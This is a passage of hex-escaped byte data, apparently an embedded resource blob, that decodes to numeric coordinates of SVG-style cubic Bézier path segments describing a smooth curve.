\x20\x31\x34\x2e\x33\x31\x32\x38\x34\x31\x32\x30\x37\x37\x20\x31\
\x30\x2e\x31\x30\x37\x32\x34\x36\x31\x36\x33\x37\x20\x31\x34\x2e\
\x33\x31\x39\x30\x38\x32\x32\x37\x36\x35\x20\x31\x30\x2e\x30\x37\
\x35\x31\x39\x30\x31\x30\x37\x38\x20\x43\x20\x31\x34\x2e\x33\x32\
\x35\x33\x32\x33\x33\x34\x35\x33\x20\x31\x30\x2e\x30\x34\x33\x31\
\x33\x34\x30\x35\x31\x38\x20\x31\x34\x2e\x33\x33\x31\x35\x36\x34\
\x34\x31\x34\x32\x20\x31\x30\x2e\x30\x31\x31\x36\x31\x34\x36\x32\
\x31\x32\x20\x31\x34\x2e\x33\x33\x37\x38\x30\x35\x34\x38\x33\x20\
\x39\x2e\x39\x38\x30\x36\x35\x32\x38\x39\x32\x38\x37\x20\x43\x20\
\x31\x34\x2e\x33\x34\x34\x30\x34\x36\x35\x35\x31\x38\x20\x39\x2e\
\x39\x34\x39\x36\x39\x31\x31\x36\x34\x35\x35\x20\x31\x34\x2e\x33\
\x35\x30\x32\x38\x37\x36\x32\x30\x37\x20\x39\x2e\x39\x31\x39\x32\
\x39\x30\x34\x39\x35\x37\x39\x20\x31\x34\x2e\x33\x35\x36\x35\x32\
\x38\x36\x38\x39\x35\x20\x39\x2e\x38\x38\x39\x34\x37\x30\x39\x35\
\x35\x34\x20\x43\x20\x31\x34\x2e\x33\x36\x32\x37\x36\x39\x37\x35\
\x38\x33\x20\x39\x2e\x38\x35\x39\x36\x35\x31\x34\x31\x35\x30\x32\
\x20\x31\x34\x2e\x33\x36\x39\x30\x31\x30\x38\x32\x37\x32\x20\x39\
\x2e\x38\x33\x30\x34\x31\x36\x35\x30\x31\x31\x32\x20\x31\x34\x2e\
\x33\x37\x35\x32\x35\x31\x38\x39\x36\x20\x39\x2e\x38\x30\x31\x37\
\x38\x35\x32\x34\x33\x33\x39\x20\x43\x20\x31\x34\x2e\x33\x38\x31\
\x34\x39\x32\x39\x36\x34\x39\x20\x39\x2e\x37\x37\x33\x31\x35\x33\
\x39\x38\x35\x36\x36\x20\x31\x34\x2e\x33\x38\x37\x37\x33\x34\x30\
\x33\x33\x37\x20\x39\x2e\x37\x34\x35\x31\x33\x30\x30\x31\x37\x36\
\x35\x20\x31\x34\x2e\x33\x39\x33\x39\x37\x35\x31\x30\x32\x35\x20\
\x39\x2e\x37\x31\x37\x37\x33\x31\x33\x30\x30\x34\x36\x20\x43\x20\
\x31\x34\x2e\x34\x30\x30\x32\x31\x36\x31\x37\x31\x34\x20\x39\x2e\
\x36\x39\x30\x33\x33\x32\x35\x38\x33\x32\x38\x20\x31\x34\x2e\x34\
\x30\x36\x34\x35\x37\x32\x34\x30\x32\x20\x39\x2e\x36\x36\x33\x35\
\x36\x32\x38\x38\x30\x32\x38\x20\x31\x34\x2e\x34\x31\x32\x36\x39\
\x38\x33\x30\x39\x20\x39\x2e\x36\x33\x37\x34\x33\x39\x30\x35\x36\
\x32\x38\x20\x43\x20\x31\x34\x2e\x34\x31\x38\x39\x33\x39\x33\x37\
\x37\x39\x20\x39\x2e\x36\x31\x31\x33\x31\x35\x32\x33\x32\x32\x38\
\x20\x31\x34\x2e\x34\x32\x35\x31\x38\x30\x34\x34\x36\x37\x20\x39\
\x2e\x35\x38\x35\x38\x34\x31\x31\x37\x34\x36\x32\x20\x31\x34\x2e\
\x34\x33\x31\x34\x32\x31\x35\x31\x35\x35\x20\x39\x2e\x35\x36\x31\
\x30\x33\x32\x36\x32\x35\x37\x32\x20\x43\x20\x31\x34\x2e\x34\x33\
\x37\x36\x36\x32\x35\x38\x34\x34\x20\x39\x2e\x35\x33\x36\x32\x32\
\x34\x30\x37\x36\x38\x32\x20\x31\x34\x2e\x34\x34\x33\x39\x30\x33\
\x36\x35\x33\x32\x20\x39\x2e\x35\x31\x32\x30\x38\x35\x30\x34\x32\
\x30\x32\x20\x31\x34\x2e\x34\x35\x30\x31\x34\x34\x37\x32\x32\x31\
\x20\x39\x2e\x34\x38\x38\x36\x33\x30\x31\x31\x37\x30\x31\x20\x43\
\x20\x31\x34\x2e\x34\x35\x36\x33\x38\x35\x37\x39\x30\x39\x20\x39\
\x2e\x34\x36\x35\x31\x37\x35\x31\x39\x31\x39\x39\x20\x31\x34\x2e\
\x34\x36\x32\x36\x32\x36\x38\x35\x39\x37\x20\x39\x2e\x34\x34\x32\
\x34\x30\x38\x34\x39\x33\x39\x31\x20\x31\x34\x2e\x34\x36\x38\x38\
\x36\x37\x39\x32\x38\x36\x20\x39\x2e\x34\x32\x30\x33\x34\x33\x34\
\x34\x39\x31\x35\x20\x43\x20\x31\x34\x2e\x34\x37\x35\x31\x30\x38\
\x39\x39\x37\x34\x20\x39\x2e\x33\x39\x38\x32\x37\x38\x34\x30\x34\
\x33\x39\x20\x31\x34\x2e\x34\x38\x31\x33\x35\x30\x30\x36\x36\x32\
\x20\x39\x2e\x33\x37\x36\x39\x31\x39\x32\x33\x35\x35\x33\x20\x31\
\x34\x2e\x34\x38\x37\x35\x39\x31\x31\x33\x35\x31\x20\x39\x2e\x33\
\x35\x36\x32\x37\x38\x31\x37\x38\x39\x33\x20\x43\x20\x31\x34\x2e\
\x34\x39\x33\x38\x33\x32\x32\x30\x33\x39\x20\x39\x2e\x33\x33\x35\
\x36\x33\x37\x31\x32\x32\x33\x33\x20\x31\x34\x2e\x35\x30\x30\x30\
\x37\x33\x32\x37\x32\x37\x20\x39\x2e\x33\x31\x35\x37\x31\x38\x34\
\x39\x39\x34\x37\x20\x31\x34\x2e\x35\x30\x36\x33\x31\x34\x33\x34\
\x31\x36\x20\x39\x2e\x32\x39\x36\x35\x33\x33\x33\x33\x37\x37\x35\
\x20\x43\x20\x31\x34\x2e\x35\x31\x32\x35\x35\x35\x34\x31\x30\x34\
\x20\x39\x2e\x32\x37\x37\x33\x34\x38\x31\x37\x36\x30\x32\x20\x31\
\x34\x2e\x35\x31\x38\x37\x39\x36\x34\x37\x39\x32\x20\x39\x2e\x32\
\x35\x38\x39\x30\x30\x38\x38\x39\x31\x35\x20\x31\x34\x2e\x35\x32\
\x35\x30\x33\x37\x35\x34\x38\x31\x20\x39\x2e\x32\x34\x31\x32\x30\
\x31\x32\x37\x38\x35\x32\x20\x43\x20\x31\x34\x2e\x35\x33\x31\x32\
\x37\x38\x36\x31\x36\x39\x20\x39\x2e\x32\x32\x33\x35\x30\x31\x36\
\x36\x37\x38\x39\x20\x31\x34\x2e\x35\x33\x37\x35\x31\x39\x36\x38\
\x35\x38\x20\x39\x2e\x32\x30\x36\x35\x35\x34\x32\x33\x32\x36\x32\
\x20\x31\x34\x2e\x35\x34\x33\x37\x36\x30\x37\x35\x34\x36\x20\x39\
\x2e\x31\x39\x30\x33\x36\x37\x35\x33\x32\x39\x35\x20\x43\x20\x31\
\x34\x2e\x35\x35\x30\x30\x30\x31\x38\x32\x33\x34\x20\x39\x2e\x31\
\x37\x34\x31\x38\x30\x38\x33\x33\x32\x38\x20\x31\x34\x2e\x35\x35\
\x36\x32\x34\x32\x38\x39\x32\x33\x20\x39\x2e\x31\x35\x38\x37\x35\
\x39\x34\x34\x36\x37\x37\x20\x31\x34\x2e\x35\x36\x32\x34\x38\x33\
\x39\x36\x31\x31\x20\x39\x2e\x31\x34\x34\x31\x31\x30\x36\x37\x39\
\x32\x38\x20\x43\x20\x31\x34\x2e\x35\x36\x38\x37\x32\x35\x30\x32\
\x39\x39\x20\x39\x2e\x31\x32\x39\x34\x36\x31\x39\x31\x31\x37\x38\
\x20\x31\x34\x2e\x35\x37\x34\x39\x36\x36\x30\x39\x38\x38\x20\x39\
\x2e\x31\x31\x35\x35\x39\x30\x34\x31\x32\x32\x35\x20\x31\x34\x2e\
\x35\x38\x31\x32\x30\x37\x31\x36\x37\x36\x20\x39\x2e\x31\x30\x32\
\x35\x30\x32\x32\x32\x30\x38\x34\x20\x43\x20\x31\x34\x2e\x35\x38\
\x37\x34\x34\x38\x32\x33\x36\x34\x20\x39\x2e\x30\x38\x39\x34\x31\
\x34\x30\x32\x39\x34\x34\x20\x31\x34\x2e\x35\x39\x33\x36\x38\x39\
\x33\x30\x35\x33\x20\x39\x2e\x30\x37\x37\x31\x31\x33\x38\x35\x39\
\x32\x39\x20\x31\x34\x2e\x35\x39\x39\x39\x33\x30\x33\x37\x34\x31\
\x20\x39\x2e\x30\x36\x35\x36\x30\x36\x34\x37\x35\x35\x35\x20\x43\
\x20\x31\x34\x2e\x36\x30\x36\x31\x37\x31\x34\x34\x33\x20\x39\x2e\
\x30\x35\x34\x30\x39\x39\x30\x39\x31\x38\x31\x20\x31\x34\x2e\x36\
\x31\x32\x34\x31\x32\x35\x31\x31\x38\x20\x39\x2e\x30\x34\x33\x33\
\x38\x39\x32\x36\x34\x35\x32\x20\x31\x34\x2e\x36\x31\x38\x36\x35\
\x33\x35\x38\x30\x36\x20\x39\x2e\x30\x33\x33\x34\x38\x30\x34\x37\
\x36\x34\x34\x20\x43\x20\x31\x34\x2e\x36\x32\x34\x38\x39\x34\x36\
\x34\x39\x35\x20\x39\x2e\x30\x32\x33\x35\x37\x31\x36\x38\x38\x33\
\x35\x20\x31\x34\x2e\x36\x33\x31\x31\x33\x35\x37\x31\x38\x33\x20\
\x39\x2e\x30\x31\x34\x34\x36\x38\x37\x35\x39\x30\x35\x20\x31\x34\
\x2e\x36\x33\x37\x33\x37\x36\x37\x38\x37\x31\x20\x39\x2e\x30\x30\
\x36\x31\x37\x33\x38\x38\x33\x35\x32\x20\x43\x20\x31\x34\x2e\x36\
\x34\x33\x36\x31\x37\x38\x35\x36\x20\x38\x2e\x39\x39\x37\x38\x37\
\x39\x30\x30\x37\x39\x39\x20\x31\x34\x2e\x36\x34\x39\x38\x35\x38\
\x39\x32\x34\x38\x20\x38\x2e\x39\x39\x30\x33\x39\x37\x30\x34\x37\
\x38\x38\x20\x31\x34\x2e\x36\x35\x36\x30\x39\x39\x39\x39\x33\x36\
\x20\x38\x2e\x39\x38\x33\x37\x32\x38\x39\x30\x37\x30\x34\x20\x43\
\x20\x31\x34\x2e\x36\x36\x32\x33\x34\x31\x30\x36\x32\x35\x20\x38\
\x2e\x39\x37\x37\x30\x36\x30\x37\x36\x36\x31\x39\x20\x31\x34\x2e\
\x36\x36\x38\x35\x38\x32\x31\x33\x31\x33\x20\x38\x2e\x39\x37\x31\
\x32\x31\x31\x33\x34\x30\x38\x31\x20\x31\x34\x2e\x36\x37\x34\x38\
\x32\x33\x32\x30\x30\x32\x20\x38\x2e\x39\x36\x36\x31\x38\x30\x32\
\x34\x32\x31\x39\x20\x43\x20\x31\x34\x2e\x36\x38\x31\x30\x36\x34\
\x32\x36\x39\x20\x38\x2e\x39\x36\x31\x31\x34\x39\x31\x34\x33\x35\
\x36\x20\x31\x34\x2e\x36\x38\x37\x33\x30\x35\x33\x33\x37\x38\x20\
\x38\x2e\x39\x35\x36\x39\x34\x31\x32\x39\x34\x38\x39\x20\x31\x34\
\x2e\x36\x39\x33\x35\x34\x36\x34\x30\x36\x37\x20\x38\x2e\x39\x35\
\x33\x35\x35\x35\x30\x31\x35\x35\x20\x43\x20\x31\x34\x2e\x36\x39\
\x39\x37\x38\x37\x34\x37\x35\x35\x20\x38\x2e\x39\x35\x30\x31\x36\
\x38\x37\x33\x36\x31\x31\x20\x31\x34\x2e\x37\x30\x36\x30\x32\x38\
\x35\x34\x34\x33\x20\x38\x2e\x39\x34\x37\x36\x30\x38\x39\x36\x38\
\x36\x20\x31\x34\x2e\x37\x31\x32\x32\x36\x39\x36\x31\x33\x32\x20\
\x38\x2e\x39\x34\x35\x38\x37\x32\x37\x34\x32\x39\x32\x20\x43\x20\
\x31\x34\x2e\x37\x31\x38\x35\x31\x30\x36\x38\x32\x20\x38\x2e\x39\
\x34\x34\x31\x33\x36\x35\x31\x37\x32\x34\x20\x31\x34\x2e\x37\x32\
\x34\x37\x35\x31\x37\x35\x30\x38\x20\x38\x2e\x39\x34\x33\x32\x32\
\x38\x37\x38\x37\x37\x34\x20\x31\x34\x2e\x37\x33\x30\x39\x39\x32\
\x38\x31\x39\x37\x20\x38\x2e\x39\x34\x33\x31\x34\x35\x32\x39\x39\
\x36\x32\x20\x43\x20\x31\x34\x2e\x37\x33\x37\x32\x33\x33\x38\x38\
\x38\x35\x20\x38\x2e\x39\x34\x33\x30\x36\x31\x38\x31\x31\x34\x39\
\x20\x31\x34\x2e\x37\x34\x33\x34\x37\x34\x39\x35\x37\x33\x20\x38\
\x2e\x39\x34\x33\x38\x30\x37\x35\x32\x33\x31\x36\x20\x31\x34\x2e\
\x37\x34\x39\x37\x31\x36\x30\x32\x36\x32\x20\x38\x2e\x39\x34\x35\
\x33\x37\x36\x39\x30\x31\x36\x34\x20\x43\x20\x31\x34\x2e\x37\x35\
\x35\x39\x35\x37\x30\x39\x35\x20\x38\x2e\x39\x34\x36\x39\x34\x36\
\x32\x38\x30\x31\x32\x20\x31\x34\x2e\x37\x36\x32\x31\x39\x38\x31\
\x36\x33\x39\x20\x38\x2e\x39\x34\x39\x33\x34\x34\x32\x38\x30\x32\
\x35\x20\x31\x34\x2e\x37\x36\x38\x34\x33\x39\x32\x33\x32\x37\x20\
\x38\x2e\x39\x35\x32\x35\x36\x34\x30\x39\x39\x34\x31\x20\x43\x20\
\x31\x34\x2e\x37\x37\x34\x36\x38\x30\x33\x30\x31\x35\x20\x38\x2e\
\x39\x35\x35\x37\x38\x33\x39\x31\x38\x35\x36\x20\x31\x34\x2e\x37\
\x38\x30\x39\x32\x31\x33\x37\x30\x34\x20\x38\x2e\x39\x35\x39\x38\
\x33\x30\x35\x30\x30\x33\x35\x20\x31\x34\x2e\x37\x38\x37\x31\x36\
\x32\x34\x33\x39\x32\x20\x38\x2e\x39\x36\x34\x36\x39\x35\x37\x38\
\x33\x30\x32\x20\x43\x20\x31\x34\x2e\x37\x39\x33\x34\x30\x33\x35\
\x30\x38\x20\x38\x2e\x39\x36\x39\x35\x36\x31\x30\x36\x35\x37\x20\
\x31\x34\x2e\x37\x39\x39\x36\x34\x34\x35\x37\x36\x39\x20\x38\x2e\
\x39\x37\x35\x32\x34\x39\x39\x37\x33\x39\x38\x20\x31\x34\x2e\x38\
\x30\x35\x38\x38\x35\x36\x34\x35\x37\x20\x38\x2e\x39\x38\x31\x37\
\x35\x33\x31\x39\x39\x34\x37\x20\x43\x20\x31\x34\x2e\x38\x31\x32\
\x31\x32\x36\x37\x31\x34\x35\x20\x38\x2e\x39\x38\x38\x32\x35\x36\
\x34\x32\x34\x39\x35\x20\x31\x34\x2e\x38\x31\x38\x33\x36\x37\x37\
\x38\x33\x34\x20\x38\x2e\x39\x39\x35\x35\x37\x38\x38\x36\x35\x38\
\x38\x20\x31\x34\x2e\x38\x32\x34\x36\x30\x38\x38\x35\x32\x32\x20\
\x39\x2e\x30\x30\x33\x37\x30\x39\x39\x38\x31\x35\x37\x20\x43\x20\
\x31\x34\x2e\x38\x33\x30\x38\x34\x39\x39\x32\x31\x31\x20\x39\x2e\
\x30\x31\x31\x38\x34\x31\x30\x39\x37\x32\x36\x20\x31\x34\x2e\x38\
\x33\x37\x30\x39\x30\x39\x38\x39\x39\x20\x39\x2e\x30\x32\x30\x37\
\x38\x35\x37\x35\x31\x38\x38\x20\x31\x34\x2e\x38\x34\x33\x33\x33\
\x32\x30\x35\x38\x37\x20\x39\x2e\x30\x33\x30\x35\x33\x32\x31\x38\
\x38\x37\x38\x20\x43\x20\x31\x34\x2e\x38\x34\x39\x35\x37\x33\x31\
\x32\x37\x36\x20\x39\x2e\x30\x34\x30\x32\x37\x38\x36\x32\x35\x36\
\x38\x20\x31\x34\x2e\x38\x35\x35\x38\x31\x34\x31\x39\x36\x34\x20\
\x39\x2e\x30\x35\x30\x38\x33\x31\x36\x36\x37\x34\x34\x20\x31\x34\
\x2e\x38\x36\x32\x30\x35\x35\x32\x36\x35\x32\x20\x39\x2e\x30\x36\
\x32\x31\x37\x38\x33\x35\x39\x36\x31\x20\x43\x20\x31\x34\x2e\x38\
\x36\x38\x32\x39\x36\x33\x33\x34\x31\x20\x39\x2e\x30\x37\x33\x35\
\x32\x35\x30\x35\x31\x37\x39\x20\x31\x34\x2e\x38\x37\x34\x35\x33\
\x37\x34\x30\x32\x39\x20\x39\x2e\x30\x38\x35\x36\x37\x30\x31\x36\
\x37\x39\x32\x20\x31\x34\x2e\x38\x38\x30\x37\x37\x38\x34\x37\x31\
\x37\x20\x39\x2e\x30\x39\x38\x35\x39\x39\x35\x37\x35\x37\x37\x20\
\x43\x20\x31\x34\x2e\x38\x38\x37\x30\x31\x39\x35\x34\x30\x36\x20\
\x39\x2e\x31\x31\x31\x35\x32\x38\x39\x38\x33\x36\x33\x20\x31\x34\
\x2e\x38\x39\x33\x32\x36\x30\x36\x30\x39\x34\x20\x39\x2e\x31\x32\
\x35\x32\x34\x37\x34\x30\x30\x33\x34\x20\x31\x34\x2e\x38\x39\x39\
\x35\x30\x31\x36\x37\x38\x32\x20\x39\x2e\x31\x33\x39\x37\x33\x39\
\x35\x33\x37\x37\x34\x20\x43\x20\x31\x34\x2e\x39\x30\x35\x37\x34\
\x32\x37\x34\x37\x31\x20\x39\x2e\x31\x35\x34\x32\x33\x31\x36\x37\
\x35\x31\x34\x20\x31\x34\x2e\x39\x31\x31\x39\x38\x33\x38\x31\x35\
\x39\x20\x39\x2e\x31\x36\x39\x35\x30\x32\x31\x38\x36\x36\x35\x20\
\x31\x34\x2e\x39\x31\x38\x32\x32\x34\x38\x38\x34\x38\x20\x39\x2e\
\x31\x38\x35\x35\x33\x34\x36\x35\x31\x38\x31\x20\x43\x20\x31\x34\
\x2e\x39\x32\x34\x34\x36\x35\x39\x35\x33\x36\x20\x39\x2e\x32\x30\
\x31\x35\x36\x37\x31\x31\x36\x39\x37\x20\x31\x34\x2e\x39\x33\x30\
\x37\x30\x37\x30\x32\x32\x34\x20\x39\x2e\x32\x31\x38\x33\x36\x36\
\x31\x31\x38\x32\x39\x20\x31\x34\x2e\x39\x33\x36\x39\x34\x38\x30\
\x39\x31\x33\x20\x39\x2e\x32\x33\x35\x39\x31\x34\x31\x32\x38\x33\
\x39\x20\x43\x20\x31\x34\x2e\x39\x34\x33\x31\x38\x39\x31\x36\x30\
\x31\x20\x39\x2e\x32\x35\x33\x34\x36\x32\x31\x33\x38\x35\x20\x31\
\x34\x2e\x39\x34\x39\x34\x33\x30\x32\x32\x38\x39\x20\x39\x2e\x32\
\x37\x31\x37\x36\x33\x36\x36\x31\x39\x32\x20\x31\x34\x2e\x39\x35\
\x35\x36\x37\x31\x32\x39\x37\x38\x20\x39\x2e\x32\x39\x30\x38\x30\
\x30\x30\x39\x31\x34\x35\x20\x43\x20\x31\x34\x2e\x39\x36\x31\x39\
\x31\x32\x33\x36\x36\x36\x20\x39\x2e\x33\x30\x39\x38\x33\x36\x35\
\x32\x30\x39\x38\x20\x31\x34\x2e\x39\x36\x38\x31\x35\x33\x34\x33\
\x35\x34\x20\x39\x2e\x33\x32\x39\x36\x31\x32\x32\x37\x36\x32\x20\
\x31\x34\x2e\x39\x37\x34\x33\x39\x34\x35\x30\x34\x33\x20\x39\x2e\
\x33\x35\x30\x31\x30\x37\x36\x39\x38\x38\x35\x20\x43\x20\x31\x34\
\x2e\x39\x38\x30\x36\x33\x35\x35\x37\x33\x31\x20\x39\x2e\x33\x37\
\x30\x36\x30\x33\x31\x32\x31\x35\x20\x31\x34\x2e\x39\x38\x36\x38\
\x37\x36\x36\x34\x32\x20\x39\x2e\x33\x39\x31\x38\x32\x32\x35\x33\
\x39\x33\x38\x20\x31\x34\x2e\x39\x39\x33\x31\x31\x37\x37\x31\x30\
\x38\x20\x39\x2e\x34\x31\x33\x37\x34\x35\x32\x37\x33\x35\x35\x20\
\x43\x20\x31\x34\x2e\x39\x39\x39\x33\x35\x38\x37\x37\x39\x36\x20\
\x39\x2e\x34\x33\x35\x36\x36\x38\x30\x30\x37\x37\x32\x20\x31\x35\
\x2e\x30\x30\x35\x35\x39\x39\x38\x34\x38\x35\x20\x39\x2e\x34\x35\
\x38\x32\x39\x38\x32\x38\x37\x35\x31\x20\x31\x35\x2e\x30\x31\x31\
\x38\x34\x30\x39\x31\x37\x33\x20\x39\x2e\x34\x38\x31\x36\x31\x34\
\x34\x34\x35\x32\x38\x20\x43\x20\x31\x35\x2e\x30\x31\x38\x30\x38\
\x31\x39\x38\x36\x31\x20\x39\x2e\x35\x30\x34\x39\x33\x30\x36\x30\
\x33\x30\x34\x20\x31\x35\x2e\x30\x32\x34\x33\x32\x33\x30\x35\x35\
\x20\x39\x2e\x35\x32\x38\x39\x33\x36\x37\x36\x33\x31\x31\x20\x31\
\x35\x2e\x30\x33\x30\x35\x36\x34\x31\x32\x33\x38\x20\x39\x2e\x35\
\x35\x33\x36\x31\x30\x33\x30\x32\x36\x31\x20\x43\x20\x31\x35\x2e\
\x30\x33\x36\x38\x30\x35\x31\x39\x32\x36\x20\x39\x2e\x35\x37\x38\
\x32\x38\x33\x38\x34\x32\x31\x31\x20\x31\x35\x2e\x30\x34\x33\x30\
\x34\x36\x32\x36\x31\x35\x20\x39\x2e\x36\x30\x33\x36\x32\x38\x37\
\x37\x33\x39\x39\x20\x31\x35\x2e\x30\x34\x39\x32\x38\x37\x33\x33\
\x30\x33\x20\x39\x2e\x36\x32\x39\x36\x32\x31\x35\x35\x35\x31\x33\
\x20\x43\x20\x31\x35\x2e\x30\x35\x35\x35\x32\x38\x33\x39\x39\x31\
\x20\x39\x2e\x36\x35\x35\x36\x31\x34\x33\x33\x36\x32\x38\x20\x31\
\x35\x2e\x30\x36\x31\x37\x36\x39\x34\x36\x38\x20\x39\x2e\x36\x38\
\x32\x32\x35\x38\x38\x36\x32\x30\x35\x20\x31\x35\x2e\x30\x36\x38\
\x30\x31\x30\x35\x33\x36\x38\x20\x39\x2e\x37\x30\x39\x35\x33\x30\
\x37\x30\x35\x34\x38\x20\x43\x20\x31\x35\x2e\x30\x37\x34\x32\x35\
\x31\x36\x30\x35\x37\x20\x39\x2e\x37\x33\x36\x38\x30\x32\x35\x34\
\x38\x39\x32\x20\x31\x35\x2e\x30\x38\x30\x34\x39\x32\x36\x37\x34\
\x35\x20\x39\x2e\x37\x36\x34\x37\x30\x35\x34\x38\x31\x37\x37\x20\
\x31\x35\x2e\x30\x38\x36\x37\x33\x33\x37\x34\x33\x33\x20\x39\x2e\
\x37\x39\x33\x32\x31\x34\x32\x33\x30\x39\x38\x20\x43\x20\x31\x35\
\x2e\x30\x39\x32\x39\x37\x34\x38\x31\x32\x32\x20\x39\x2e\x38\x32\
\x31\x37\x32\x32\x39\x38\x30\x31\x38\x20\x31\x35\x2e\x30\x39\x39\
\x32\x31\x35\x38\x38\x31\x20\x39\x2e\x38\x35\x30\x38\x34\x31\x31\
\x38\x38\x30\x36\x20\x31\x35\x2e\x31\x30\x35\x34\x35\x36\x39\x34\
\x39\x38\x20\x39\x2e\x38\x38\x30\x35\x34\x32\x37\x37\x34\x35\x32\
\x20\x43\x20\x31\x35\x2e\x31\x31\x31\x36\x39\x38\x30\x31\x38\x37\
\x20\x39\x2e\x39\x31\x30\x32\x34\x34\x33\x36\x30\x39\x39\x20\x31\
\x35\x2e\x31\x31\x37\x39\x33\x39\x30\x38\x37\x35\x20\x39\x2e\x39\
\x34\x30\x35\x33\x32\x38\x33\x33\x32\x39\x20\x31\x35\x2e\x31\x32\
\x34\x31\x38\x30\x31\x35\x36\x33\x20\x39\x2e\x39\x37\x31\x33\x38\
\x31\x33\x34\x34\x36\x32\x20\x43\x20\x31\x35\x2e\x31\x33\x30\x34\
\x32\x31\x32\x32\x35\x32\x20\x31\x30\x2e\x30\x30\x32\x32\x32\x39\
\x38\x35\x36\x20\x31\x35\x2e\x31\x33\x36\x36\x36\x32\x32\x39\x34\
\x20\x31\x30\x2e\x30\x33\x33\x36\x34\x31\x37\x37\x33\x31\x20\x31\
\x35\x2e\x31\x34\x32\x39\x30\x33\x33\x36\x32\x39\x20\x31\x30\x2e\
\x30\x36\x35\x35\x38\x39\x35\x32\x34\x20\x43\x20\x31\x35\x2e\x31\
\x34\x39\x31\x34\x34\x34\x33\x31\x37\x20\x31\x30\x2e\x30\x39\x37\
\x35\x33\x37\x32\x37\x34\x39\x20\x31\x35\x2e\x31\x35\x35\x33\x38\
\x35\x35\x30\x30\x35\x20\x31\x30\x2e\x31\x33\x30\x30\x32\x34\x30\
\x38\x30\x37\x20\x31\x35\x2e\x31\x36\x31\x36\x32\x36\x35\x36\x39\
\x34\x20\x31\x30\x2e\x31\x36\x33\x30\x32\x31\x36\x38\x36\x37\x20\
\x43\x20\x31\x35\x2e\x31\x36\x37\x38\x36\x37\x36\x33\x38\x32\x20\
\x31\x30\x2e\x31\x39\x36\x30\x31\x39\x32\x39\x32\x37\x20\x31\x35\
\x2e\x31\x37\x34\x31\x30\x38\x37\x30\x37\x20\x31\x30\x2e\x32\x32\
\x39\x35\x33\x30\x37\x36\x39\x33\x20\x31\x35\x2e\x31\x38\x30\x33\
\x34\x39\x37\x37\x35\x39\x20\x31\x30\x2e\x32\x36\x33\x35\x32\x37\
\x32\x32\x33\x31\x20\x43\x20\x31\x35\x2e\x31\x38\x36\x35\x39\x30\
\x38\x34\x34\x37\x20\x31\x30\x2e\x32\x39\x37\x35\x32\x33\x36\x37\
\x36\x38\x20\x31\x35\x2e\x31\x39\x32\x38\x33\x31\x39\x31\x33\x35\
\x20\x31\x30\x2e\x33\x33\x32\x30\x30\x38\x30\x32\x32\x37\x20\x31\
\x35\x2e\x31\x39\x39\x30\x37\x32\x39\x38\x32\x34\x20\x31\x30\x2e\
\x33\x36\x36\x39\x35\x30\x37\x37\x32\x39\x20\x43\x20\x31\x35\x2e\
\x32\x30\x35\x33\x31\x34\x30\x35\x31\x32\x20\x31\x30\x2e\x34\x30\
\x31\x38\x39\x33\x35\x32\x33\x20\x31\x35\x2e\x32\x31\x31\x35\x35\
\x35\x31\x32\x20\x31\x30\x2e\x34\x33\x37\x32\x39\x37\x34\x33\x32\
\x36\x20\x31\x35\x2e\x32\x31\x37\x37\x39\x36\x31\x38\x38\x39\x20\
\x31\x30\x2e\x34\x37\x33\x31\x33\x32\x34\x36\x35\x20\x43\x20\x31\
\x35\x2e\x32\x32\x34\x30\x33\x37\x32\x35\x37\x37\x20\x31\x30\x2e\
\x35\x30\x38\x39\x36\x37\x34\x39\x37\x35\x20\x31\x35\x2e\x32\x33\
\x30\x32\x37\x38\x33\x32\x36\x36\x20\x31\x30\x2e\x35\x34\x35\x32\
\x33\x36\x32\x34\x33\x37\x20\x31\x35\x2e\x32\x33\x36\x35\x31\x39\
\x33\x39\x35\x34\x20\x31\x30\x2e\x35\x38\x31\x39\x30\x38\x31\x36\
\x35\x31\x20\x43\x20\x31\x35\x2e\x32\x34\x32\x37\x36\x30\x34\x36\
\x34\x32\x20\x31\x30\x2e\x36\x31\x38\x35\x38\x30\x30\x38\x36\x34\
\x20\x31\x35\x2e\x32\x34\x39\x30\x30\x31\x35\x33\x33\x31\x20\x31\
\x30\x2e\x36\x35\x35\x36\x35\x37\x36\x30\x35\x35\x20\x31\x35\x2e\
\x32\x35\x35\x32\x34\x32\x36\x30\x31\x39\x20\x31\x30\x2e\x36\x39\
\x33\x31\x30\x39\x37\x32\x38\x37\x20\x43\x20\x31\x35\x2e\x32\x36\
\x31\x34\x38\x33\x36\x37\x30\x37\x20\x31\x30\x2e\x37\x33\x30\x35\
\x36\x31\x38\x35\x31\x39\x20\x31\x35\x2e\x32\x36\x37\x37\x32\x34\
\x37\x33\x39\x36\x20\x31\x30\x2e\x37\x36\x38\x33\x39\x30\x38\x32\
\x39\x38\x20\x31\x35\x2e\x32\x37\x33\x39\x36\x35\x38\x30\x38\x34\
\x20\x31\x30\x2e\x38\x30\x36\x35\x36\x35\x32\x36\x31\x37\x20\x43\
\x20\x31\x35\x2e\x32\x38\x30\x32\x30\x36\x38\x37\x37\x32\x20\x31\
\x30\x2e\x38\x34\x34\x37\x33\x39\x36\x39\x33\x36\x20\x31\x35\x2e\
\x32\x38\x36\x34\x34\x37\x39\x34\x36\x31\x20\x31\x30\x2e\x38\x38\
\x33\x32\x36\x31\x36\x35\x34\x38\x20\x31\x35\x2e\x32\x39\x32\x36\
\x38\x39\x30\x31\x34\x39\x20\x31\x30\x2e\x39\x32\x32\x30\x39\x39\
\x33\x38\x35\x39\x20\x43\x20\x31\x35\x2e\x32\x39\x38\x39\x33\x30\
\x30\x38\x33\x38\x20\x31\x30\x2e\x39\x36\x30\x39\x33\x37\x31\x31\
\x36\x39\x20\x31\x35\x2e\x33\x30\x35\x31\x37\x31\x31\x35\x32\x36\
\x20\x31\x31\x2e\x30\x30\x30\x30\x39\x32\x35\x31\x34\x35\x20\x31\
\x35\x2e\x33\x31\x31\x34\x31\x32\x32\x32\x31\x34\x20\x31\x31\x2e\
\x30\x33\x39\x35\x33\x33\x35\x30\x39\x37\x20\x43\x20\x31\x35\x2e\
\x33\x31\x37\x36\x35\x33\x32\x39\x30\x33\x20\x31\x31\x2e\x30\x37\
\x38\x39\x37\x34\x35\x30\x35\x20\x31\x35\x2e\x33\x32\x33\x38\x39\
\x34\x33\x35\x39\x31\x20\x31\x31\x2e\x31\x31\x38\x37\x30\x32\x38\
\x31\x33\x20\x31\x35\x2e\x33\x33\x30\x31\x33\x35\x34\x32\x37\x39\
\x20\x31\x31\x2e\x31\x35\x38\x36\x38\x36\x31\x30\x34\x39\x20\x43\
\x20\x31\x35\x2e\x33\x33\x36\x33\x37\x36\x34\x39\x36\x38\x20\x31\
